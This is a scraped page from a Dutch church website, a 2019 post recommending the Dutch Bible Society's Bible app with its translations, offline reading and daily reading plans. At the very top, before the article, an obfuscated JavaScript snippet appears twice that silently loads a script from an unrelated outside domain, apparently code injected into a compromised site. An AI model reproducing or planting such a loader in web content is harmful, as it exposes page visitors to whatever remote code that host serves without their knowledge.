;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); De Bijbel op je telefoon     - PKN Damwâld

De Bijbel op je telefoon    

Gepubliceerd op: vrijdag 17 mei 2019

De Bijbel kent vele verschijningsvormen. De nieuwste is de Bijbel als app op je telefoon. Het is een app van het Nederlands Bijbelgenootschap en is vrij te downloaden via Google Play store (android) of de App store (Apple) . Je kunt de Bijbel in verschillende vertalingen lezen, en daar ook tussen switchen, net waar je het voor wilt gebruiken. De Bijbelvertalingen kun je per stuk downloaden, zodat de Bijbel ook offline te lezen is.

Naast de Bijbelboeken biedt de app ook leesplannen voor wie wat extra hulp of uitleg wil. Zo is/was er een leesplan voor de 40-dagen tijd, een Bijbel-leesrooster met iedere dag een passage uit de Bijbel met toelichting, een vakantie-leesrooster en meer.

Het leuke vind ik, dat je met zo’n leesplan (waar je je met een druk op de knop voor kunt aanmelden en ook weer afmelden) standaard een melding krijgt om de Bijbel te lezen. En automatisch lees je dan toch vaak door en ben je zo dagelijks even (extra) bezig met je geloof. Heel laagdrempelig en overal te gebruiken. Probeer het maar!